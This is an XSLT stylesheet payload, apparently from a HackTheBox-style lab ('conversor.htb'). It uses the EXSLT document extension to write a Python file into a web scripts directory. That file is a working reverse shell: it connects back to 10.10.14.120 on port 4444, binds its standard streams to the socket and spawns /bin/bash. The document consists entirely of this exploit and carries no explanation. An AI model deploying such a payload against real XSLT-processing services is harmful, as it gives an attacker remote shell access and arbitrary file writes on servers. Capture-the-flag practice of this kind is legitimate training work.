<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet 
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 
    xmlns:revshell="http://exslt.org/common"
    extension-element-prefixes="revshell"
    version="1.0">
  <xsl:template match="/">
    <revshell:document href="/var/www/conversor.htb/scripts/revshell.py" method="text">
import os,pty,socket
s=socket.socket()
s.connect(("10.10.14.120",4444))
[os.dup2(s.fileno(),f)for f in(0,1,2)]
pty.spawn("/bin/bash")
    </revshell:document>
  </xsl:template>
</xsl:stylesheet>
